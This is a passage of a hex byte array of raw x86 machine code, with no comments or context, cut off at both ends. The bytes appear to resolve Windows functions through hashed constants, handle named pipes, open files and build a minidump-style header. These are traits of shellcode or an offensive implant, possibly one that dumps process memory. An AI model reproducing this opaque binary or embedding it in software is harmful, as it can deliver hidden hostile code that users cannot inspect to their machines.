0xE1,0x88,0x6C,0xFF,0xD0,0x85,0xC0,0x75,0x0B,0x8B,0x45,0xF4,0x8B,0x40,0x18,0xE9,0xDB,0x00,0x00,0x00,0x8B,0x45,0xF4,0x8B,0x00,0x89,0x45,0xF4,0x8B,0x45,0xF4,0x3B,0x45,0xE8,0x75,0x9E,0x83,0x7D,0x0C,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xBB,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0xC7,0x04,0x24,0x14,0x82,0x88,0x6C,0xE8,0x25,0xFF,0xFF,0xFF,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0xDA,0xEC,0x01,0xA3,0x89,0x04,0x24,0xE8,0x94,0xFD,0xFF,0xFF,0x89,0x45,0xE0,0x83,0x7D,0xE0,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x7F,0xC7,0x45,0xCC,0x00,0x00,0x00,0x00,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x45,0xD0,0x8B,0x45,0xD0,0xC7,0x44,0x24,0x04,0x04,0x01,0x00,0x00,0x89,0x04,0x24,0xE8,0xDE,0x1A,0x00,0x00,0x66,0x89,0x45,0xCC,0x0F,0xB7,0x45,0xCC,0x01,0xC0,0x66,0x89,0x45,0xCC,0x0F,0xB7,0x45,0xCC,0x83,0xC0,0x02,0x66,0x89,0x45,0xCE,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0x8D,0x45,0xC8,0x89,0x44,0x24,0x0C,0x8D,0x45,0xCC,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0xC7,0x04,0x24,0x00,0x00,0x00,0x00,0x8B,0x45,0xE0,0xFF,0xD0,0x83,0xEC,0x10,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x03,0x8B,0x45,0xC8,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x78,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xC0,0x00,0x00,0x00,0x00,0xC7,0x45,0xC4,0x00,0x00,0x00,0x00,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x45,0xCC,0x00,0x00,0x00,0x00,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0xC7,0x45,0xB4,0x00,0x00,0x00,0x00,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0xC7,0x45,0xBC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0xC7,0x45,0xD4,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0xC7,0x04,0x24,0x28,0x82,0x88,0x6C,0xE8,0xEB,0xFD,0xFF,0xFF,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x1D,0x21,0x88,0x03,0x89,0x04,0x24,0xE8,0x5A,0xFC,0xFF,0xFF,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x0F,0x84,0x9B,0x01,0x00,0x00,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0xC7,0x04,0x24,0x28,0x82,0x88,0x6C,0xE8,0xB2,0xFD,0xFF,0xFF,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x86,0xE8,0x93,0x16,0x89,0x04,0x24,0xE8,0x21,0xFC,0xFF,0xFF,0x89,0x45,0xD8,0x83,0x7D,0xD8,0x00,0x0F,0x84,0x65,0x01,0x00,0x00,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0xC7,0x04,0x24,0x42,0x82,0x88,0x6C,0xE8,0x79,0xFD,0xFF,0xFF,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x44,0x3B,0x99,0x58,0x89,0x04,0x24,0xE8,0xE8,0xFB,0xFF,0xFF,0x89,0x45,0xD4,0x83,0x7D,0xD4,0x00,0x0F,0x84,0x2F,0x01,0x00,0x00,0xA1,0x08,0xE1,0x88,0x6C,0xFF,0xD0,0xC7,0x44,0x24,0x08,0x0A,0x02,0x00,0x00,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x0C,0xE1,0x88,0x6C,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x0F,0x84,0x01,0x01,0x00,0x00,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0x8D,0x45,0xC0,0x89,0x04,0x24,0x8B,0x45,0xDC,0xFF,0xD0,0x83,0xEC,0x08,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x0F,0x84,0xE1,0x00,0x00,0x00,0xC7,0x44,0x24,0x0C,0x00,0x00,0x00,0x00,0x8D,0x45,0xB4,0x83,0xC0,0x04,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0xC7,0x04,0x24,0x5C,0x82,0x88,0x6C,0x8B,0x45,0xD8,0xFF,0xD0,0x83,0xEC,0x10,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x0F,0x84,0xAE,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x44,0x24,0x0C,0xC7,0x44,0x24,0x08,0x82,0x82,0x88,0x6C,0xC7,0x44,0x24,0x04,0x04,0x01,0x00,0x00,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0x08,0x1B,0x00,0x00,0x83,0x7D,0x0C,0x00,0x74,0x07,0xB8,0x03,0x00,0x00,0x40,0xEB,0x05,0xB8,0x03,0x00,0x00,0x00,0x89,0x45,0xE8,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xE0,0xFF,0x00,0x00,0x00,0x8D,0x45,0xB4,0x89,0x44,0x24,0x1C,0xC7,0x44,0x24,0x18,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x14,0x00,0x10,0x00,0x00,0xC7,0x44,0x24,0x10,0x00,0x10,0x00,0x00,0x8B,0x45,0xE0,0x89,0x44,0x24,0x0C,0x8B,0x45,0xE4,0x89,0x44,0x24,0x08,0x8B,0x45,0xE8,0x89,0x44,0x24,0x04,0x8B,0x45,0xF0,0x89,0x04,0x24,0x8B,0x45,0xD4,0xFF,0xD0,0x83,0xEC,0x20,0x8B,0x55,0x10,0x89,0x02,0x8B,0x45,0x10,0x8B,0x00,0x83,0xF8,0xFF,0x74,0x1B,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x13,0x90,0xEB,0x10,0x90,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x7D,0xF0,0x00,0x74,0x23,0xA1,0x08,0xE1,0x88,0x6C,0xFF,0xD0,0x8B,0x55,0xF0,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x10,0xE1,0x88,0x6C,0xFF,0xD0,0x83,0xEC,0x0C,0x8B,0x45,0xF4,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x38,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0xC7,0x04,0x24,0x42,0x82,0x88,0x6C,0xE8,0xBB,0xFB,0xFF,0xFF,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0xA4,0x6E,0x97,0x24,0x89,0x04,0x24,0xE8,0x2A,0xFA,0xFF,0xFF,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x0F,0x84,0xA5,0x00,0x00,0x00,0xA1,0x08,0xE1,0x88,0x6C,0xFF,0xD0,0xC7,0x44,0x24,0x08,0x0A,0x02,0x00,0x00,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x0C,0xE1,0x88,0x6C,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x74,0x7B,0x8B,0x45,0x08,0x89,0x44,0x24,0x0C,0xC7,0x44,0x24,0x08,0x82,0x82,0x88,0x6C,0xC7,0x44,0x24,0x04,0x04,0x01,0x00,0x00,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0xA7,0x19,0x00,0x00,0xC7,0x44,0x24,0x18,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x14,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x10,0x03,0x00,0x00,0x00,0xC7,0x44,0x24,0x0C,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0xC0,0x8B,0x45,0xF0,0x89,0x04,0x24,0x8B,0x45,0xEC,0xFF,0xD0,0x83,0xEC,0x1C,0x8B,0x55,0x0C,0x89,0x02,0x8B,0x45,0x0C,0x8B,0x00,0x83,0xF8,0xFF,0x74,0x0F,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x7D,0xF0,0x00,0x74,0x23,0xA1,0x08,0xE1,0x88,0x6C,0xFF,0xD0,0x8B,0x55,0xF0,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x10,0xE1,0x88,0x6C,0xFF,0xD0,0x83,0xEC,0x0C,0x8B,0x45,0xF4,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x28,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0xC7,0x04,0x24,0x42,0x82,0x88,0x6C,0xE8,0x8D,0xFA,0xFF,0xFF,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x66,0x94,0x01,0x96,0x89,0x04,0x24,0xE8,0xFC,0xF8,0xFF,0xFF,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x74,0x36,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0x8B,0x45,0xEC,0xFF,0xD0,0x83,0xEC,0x08,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x75,0x0E,0xA1,0xFC,0xE0,0x88,0x6C,0xFF,0xD0,0x3D,0x17,0x02,0x00,0x00,0x75,0x0C,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xF4,0xC9,0xC3,0x55,0x89,0xE5,0x53,0x83,0xEC,0x34,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0xC7,0x04,0x24,0x42,0x82,0x88,0x6C,0xE8,0xF6,0xF9,0xFF,0xFF,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x8F,0x97,0x38,0x8D,0x89,0x04,0x24,0xE8,0x65,0xF8,0xFF,0xFF,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x0F,0x84,0x87,0x00,0x00,0x00,0xA1,0x08,0xE1,0x88,0x6C,0xFF,0xD0,0xC7,0x44,0x24,0x08,0x00,0x10,0x00,0x00,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x0C,0xE1,0x88,0x6C,0xFF,0xD0,0x83,0xEC,0x0C,0x8B,0x55,0x0C,0x89,0x02,0x8B,0x45,0x0C,0x8B,0x00,0x85,0xC0,0x74,0x58,0x8B,0x45,0x0C,0x8B,0x00,0xC7,0x44,0x24,0x10,0x00,0x00,0x00,0x00,0x8D,0x55,0xE8,0x89,0x54,0x24,0x0C,0xC7,0x44,0x24,0x08,0x00,0x10,0x00,0x00,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0x8B,0x45,0xEC,0xFF,0xD0,0x83,0xEC,0x14,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x74,0x24,0x8B,0x45,0xE8,0x85,0xC0,0x74,0x1D,0x83,0x7D,0x10,0x00,0x74,0x08,0x8B,0x55,0xE8,0x8B,0x45,0x10,0x89,0x10,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x7D,0xF4,0x00,0x75,0x37,0x8B,0x45,0x0C,0x8B,0x00,0x85,0xC0,0x74,0x2E,0x8B,0x45,0x0C,0x8B,0x18,0xA1,0x08,0xE1,0x88,0x6C,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x10,0xE1,0x88,0x6C,0xFF,0xD0,0x83,0xEC,0x0C,0x8B,0x45,0x0C,0xC7,0x00,0x00,0x00,0x00,0x00,0x8B,0x45,0xF4,0x8B,0x5D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0x53,0x83,0xEC,0x24,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xA1,0x08,0xE1,0x88,0x6C,0xFF,0xD0,0xC7,0x44,0x24,0x08,0x00,0x10,0x00,0x00,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x0C,0xE1,0x88,0x6C,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xEC,0x8B,0x45,0xEC,0x85,0xC0,0x0F,0x84,0xBC,0x00,0x00,0x00,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0x8D,0x45,0xEC,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x69,0xFE,0xFF,0xFF,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x0F,0x84,0x98,0x00,0x00,0x00,0x8B,0x45,0xEC,0x8B,0x00,0x85,0xC0,0x0F,0x85,0x8E,0x00,0x00,0x00,0x83,0x7D,0x0C,0x00,0x74,0x51,0xA1,0x08,0xE1,0x88,0x6C,0xFF,0xD0,0xC7,0x44,0x24,0x08,0x05,0x01,0x00,0x00,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x0C,0xE1,0x88,0x6C,0xFF,0xD0,0x83,0xEC,0x0C,0x8B,0x55,0x0C,0x89,0x02,0x8B,0x45,0x0C,0x8B,0x00,0x85,0xC0,0x74,0x59,0x8B,0x45,0xEC,0x8D,0x50,0x04,0x8B,0x45,0x0C,0x8B,0x00,0xC7,0x44,0x24,0x08,0x05,0x01,0x00,0x00,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xE8,0x3D,0x16,0x00,0x00,0x83,0x7D,0x10,0x00,0x74,0x0E,0x8B,0x45,0xEC,0x8B,0x90,0x18,0x04,0x00,0x00,0x8B,0x45,0x10,0x89,0x10,0x83,0x7D,0x14,0x00,0x74,0x0E,0x8B,0x45,0xEC,0x8B,0x90,0x1C,0x04,0x00,0x00,0x8B,0x45,0x14,0x89,0x10,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xEC,0x85,0xC0,0x74,0x23,0x8B,0x5D,0xEC,0xA1,0x08,0xE1,0x88,0x6C,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x10,0xE1,0x88,0x6C,0xFF,0xD0,0x83,0xEC,0x0C,0x8B,0x45,0xF4,0x8B,0x5D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x38,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0xC7,0x04,0x24,0x42,0x82,0x88,0x6C,0xE8,0x82,0xF7,0xFF,0xFF,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x6F,0x1B,0x7C,0xED,0x89,0x04,0x24,0xE8,0xF1,0xF5,0xFF,0xFF,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x74,0x4B,0xC7,0x44,0x24,0x10,0x00,0x00,0x00,0x00,0x8D,0x45,0xE8,0x89,0x44,0x24,0x0C,0x8B,0x45,0x10,0x89,0x44,0x24,0x08,0x8B,0x45,0x0C,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0x8B,0x45,0xEC,0xFF,0xD0,0x83,0xEC,0x14,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x75,0x0E,0xA1,0xFC,0xE0,0x88,0x6C,0xFF,0xD0,0x3D,0xE5,0x03,0x00,0x00,0x75,0x0C,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xF4,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x28,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xA1,0x08,0xE1,0x88,0x6C,0xFF,0xD0,0xC7,0x44,0x24,0x08,0x20,0x04,0x00,0x00,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x0C,0xE1,0x88,0x6C,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x74,0x6A,0x8B,0x45,0xEC,0xC7,0x00,0x00,0x00,0x00,0x00,0x8B,0x45,0xEC,0x8D,0x50,0x04,0xC7,0x44,0x24,0x08,0x05,0x01,0x00,0x00,0x8B,0x45,0x0C,0x89,0x44,0x24,0x04,0x89,0x14,0x24,0xE8,0xB7,0x14,0x00,0x00,0x8B,0x45,0xEC,0x8B,0x55,0x10,0x89,0x90,0x18,0x04,0x00,0x00,0x8B,0x45,0xEC,0x8B,0x55,0x14,0x89,0x90,0x1C,0x04,0x00,0x00,0xC7,0x44,0x24,0x08,0x20,0x04,0x00,0x00,0x8B,0x45,0xEC,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xB5,0xFE,0xFF,0xFF,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x74,0x0C,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x7D,0xEC,0x00,0x74,0x23,0xA1,0x08,0xE1,0x88,0x6C,0xFF,0xD0,0x8B,0x55,0xEC,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x10,0xE1,0x88,0x6C,0xFF,0xD0,0x83,0xEC,0x0C,0x8B,0x45,0xF4,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x28,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x83,0x7D,0x08,0x00,0x74,0x06,0x83,0x7D,0x08,0xFF,0x75,0x07,0xB8,0x01,0x00,0x00,0x00,0xEB,0x63,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0xC7,0x04,0x24,0x42,0x82,0x88,0x6C,0xE8,0xE7,0xF5,0xFF,0xFF,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0xEA,0x7A,0xA4,0xAE,0x89,0x04,0x24,0xE8,0x56,0xF4,0xFF,0xFF,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x74,0x20,0x8B,0x45,0x08,0x89,0x04,0x24,0x8B,0x45,0xEC,0xFF,0xD0,0x83,0xEC,0x04,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x74,0x0C,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xF4,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x28,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xA1,0x08,0xE1,0x88,0x6C,0xFF,0xD0,0xC7,0x44,0x24,0x08,0x20,0x04,0x00,0x00,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x0C,0xE1,0x88,0x6C,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x74,0x3E,0x8B,0x45,0xEC,0xC7,0x00,0x01,0x00,0x00,0x00,0x8B,0x45,0xEC,0x8B,0x55,0x0C,0x89,0x50,0x04,0xC7,0x44,0x24,0x08,0x20,0x04,0x00,0x00,0x8B,0x45,0xEC,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x71,0xFD,0xFF,0xFF,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x74,0x0C,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x7D,0xEC,0x00,0x74,0x23,0xA1,0x08,0xE1,0x88,0x6C,0xFF,0xD0,0x8B,0x55,0xEC,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x10,0xE1,0x88,0x6C,0xFF,0xD0,0x83,0xEC,0x0C,0x8B,0x45,0xF4,0xC9,0xC3,0x55,0x89,0xE5,0x53,0x83,0xEC,0x24,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0x8D,0x45,0xEC,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x82,0xFA,0xFF,0xFF,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x74,0x1E,0x8B,0x45,0xEC,0x8B,0x00,0x83,0xF8,0x01,0x75,0x17,0x8B,0x45,0xEC,0x8B,0x50,0x04,0x8B,0x45,0x0C,0x89,0x10,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xEC,0x85,0xC0,0x74,0x23,0x8B,0x5D,0xEC,0xA1,0x08,0xE1,0x88,0x6C,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x10,0xE1,0x88,0x6C,0xFF,0xD0,0x83,0xEC,0x0C,0x8B,0x45,0xF4,0x8B,0x5D,0xFC,0xC9,0xC3,0x90,0x90,0x55,0x89,0xE5,0x57,0x53,0x81,0xEC,0x60,0x02,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xB9,0x00,0x00,0x00,0x00,0xB8,0x18,0x00,0x00,0x00,0x83,0xE0,0xFC,0x89,0xC2,0xB8,0x00,0x00,0x00,0x00,0x89,0x4C,0x05,0xC4,0x83,0xC0,0x04,0x39,0xD0,0x72,0xF5,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xC0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x8D,0x95,0xB8,0xFD,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xB9,0x82,0x00,0x00,0x00,0x89,0xD7,0xF3,0xAB,0xC7,0x85,0xB0,0xFD,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0xB4,0xFD,0xFF,0xFF,0x00,0x00,0x00,0x00,0x8D,0x45,0xE4,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0xC7,0x04,0x24,0x9C,0x82,0x88,0x6C,0xE8,0x2F,0xF5,0xFF,0xFF,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x0F,0x84,0x75,0x01,0x00,0x00,0x8B,0x45,0xE4,0x89,0x04,0x24,0xE8,0xD7,0xF8,0xFF,0xFF,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x0F,0x84,0x60,0x01,0x00,0x00,0x8B,0x45,0xE4,0xC7,0x44,0x24,0x0C,0x00,0x00,0x00,0x00,0x8D,0x55,0xDC,0x89,0x54,0x24,0x08,0x8D,0x55,0xE0,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xE8,0x67,0xFA,0xFF,0xFF,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x0F,0x84,0x35,0x01,0x00,0x00,0x8D,0x85,0xB8,0xFD,0xFF,0xFF,0x89,0x85,0xB4,0xFD,0xFF,0xFF,0x66,0xC7,0x85,0xB0,0xFD,0xFF,0xFF,0x00,0x00,0x66,0xC7,0x85,0xB2,0xFD,0xFF,0xFF,0x00,0x00,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0x8B,0x45,0xE0,0x89,0x44,0x24,0x04,0x8D,0x85,0xB0,0xFD,0xFF,0xFF,0x89,0x04,0x24,0xE8,0x4A,0xBC,0xFF,0xFF,0x8D,0x85,0xB0,0xFD,0xFF,0xFF,0x89,0x04,0x24,0xE8,0xA0,0xBE,0xFF,0xFF,0x85,0xC0,0x0F,0x84,0xE1,0x00,0x00,0x00,0x8B,0x45,0xDC,0x85,0xC0,0x74,0x15,0xC7,0x45,0xD4,0x4D,0x44,0x4D,0x50,0x66,0xC7,0x45,0xD8,0x93,0xA7,0x66,0xC7,0x45,0xDA,0x00,0x00,0xEB,0x22,0x8D,0x45,0xC4,0x83,0xC0,0x16,0x89,0x44,0x24,0x08,0x8D,0x45,0xC4,0x83,0xC0,0x14,0x89,0x44,0x24,0x04,0x8D,0x45,0xC4,0x83,0xC0,0x10,0x89,0x04,0x24,0xE8,0xD8,0xC4,0xFF,0xFF,0xC7,0x45,0xEC,0xFF,0xFF,0xFF,0xFF,0xC7,0x45,0xC0,0x00,0x00,0x80,0x0C,0x8D,0x45,0xC0,0x89,0x04,0x24,0xE8,0x06,0xC4,0xFF,0xFF,0x89,0x45,0xE8,0x83,0x7D,0xE8,0x00,0x0F,0x84,0x80,0x00,0x00,0x00,0x8B,0x45,0xEC,0x89,0x45,0xC4,0x8B,0x45,0xE8,0x89,0x45,0xC8,0xC7,0x45,0xCC,0x00,0x00,0x00,0x00,0x8B,0x45,0xC0,0x89,0x45,0xD0,0x8D,0x45,0xC4,0x89,0x04,0x24,0xE8,0x4B,0xED,0xFF,0xFF,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x74,0x56,0x8B,0x45,0xDC,0x85,0xC0,0x75,0x12,0x8B,0x55,0xCC,0x8B,0x45,0xC8,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xE8,0x07,0xC4,0xFF,0xFF,0x8B,0x55,0xCC,0x8B,0x45,0xC8,0x89,0x54,0x24,0x08,0x89,0x44,0x24,0x04,0x8D,0x85,0xB0,0xFD,0xFF,0xFF,0x89,0x04,0x24,0xE8,0x6F,0xBC,0xFF,0xFF,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x74,0x1B,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x13,0x90,0xEB,0x10,0x90,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xC8,0x85,0xC0,0x74,0x19,0x8B,0x45,0